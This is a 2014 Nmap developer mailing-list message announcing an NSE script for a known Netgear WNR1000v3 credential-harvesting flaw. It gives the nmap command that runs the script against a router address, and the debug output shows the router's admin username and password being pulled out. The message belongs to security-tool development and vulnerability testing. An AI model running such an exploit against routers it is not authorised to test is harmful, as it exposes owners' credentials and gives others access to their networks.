mailing list archives
Re: [NSE] Script for Netgear WNR1000v3 Credential Harvesting Exploit
From: Paul AMAR <aos.paul () gmail com>
Date: Fri, 14 Mar 2014 16:24:09 +0100
Did you think about adding this to the current revision ?
2014-02-11 22:02 GMT+01:00 Paul AMAR <aos.paul () gmail com>:
I developed the NSE script regarding the exploit : *Netgear WNR1000v3
Credential Harvesting Exploit* discovered by c1ph04.
This has been released the 26th of January 2014.
Here are few references :
and obviously :
I have a Netgear WNR1000 at home so I could try it by myself with the
Command line to launch the script :
*./nmap -p80 -n -Pn --script http-vuln-wnr-1000 192.168.1.1 -d*
NSE: Script scanning 192.168.1.1.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting http-vuln-wnr-1000 against 192.168.1.1:80.
Initiating NSE at 21:49
NSE: username : admin
NSE: password : password
NSE: Finished http-vuln-wnr-1000 against 192.168.1.1:80.
Completed NSE at 21:49, 0.27s elapsed
Sent through the dev mailing list
Archived at http://seclists.org/nmap-dev/